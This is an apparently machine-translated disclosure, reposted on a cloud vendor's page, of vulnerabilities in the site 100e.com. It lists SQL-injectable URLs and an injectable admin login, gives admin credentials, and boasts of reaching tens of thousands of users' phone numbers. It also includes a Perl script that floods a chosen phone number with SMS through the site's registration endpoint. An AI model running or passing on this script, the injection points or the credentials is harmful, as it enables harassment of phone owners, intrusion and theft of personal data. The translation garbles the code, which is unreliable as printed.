100e one hundred vulnerability collection

Source: Internet
Author: User

For details, multiple security vulnerabilities may cause leakage of million user sensitive information.
Http://edu.100e.com/course/instance? Id = 4091

 

Http://space.100e.com/myspace/MyDiaryList.asp? Username = admin

 

All are injection
Http://admin.100e.com backend
The login box is post injection.

 

U: 0001 P: 111 enter
What do you know in the background? The phone number of the 8.7W user is quite impressive.
The background is also injected.

 

It seems that the whole site is injected wherever the database is queried --
Shell won't take it, so it may be suspected of taking off pants.

Then there is a powerful SMS Ddos attack interface, where the registration is verified ~~
I wrote a script with perl to test it. It's easy to use!




 


Use strict;
Use LWP: Simple;
Require LWP: UserAgent;
My $ url = 'HTTP: // passport.100e.com/register/new/step_mobile.aspx ';
My $ ua = LWP: UserAgent-> new;
$ Ua-> timeout (10 );
Print "Enter the mobile phone number to attack :";
My $ dh = <STDIN>;
Chomp $ dh;
Print "Enter the number of attacks :";
My $ I = <STDIN>;
Chomp $ I;
For (my $ a = 1; $ a <= $ I; $ a ++)
{
My $ response = $ ua-> post ($ url,
['Postback' => 'postback ',
'Mobile' => "$ dh"]
);
Print "$ a sent \ n ";
}


Solution:

Inject for filtering, text message verification plus time.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.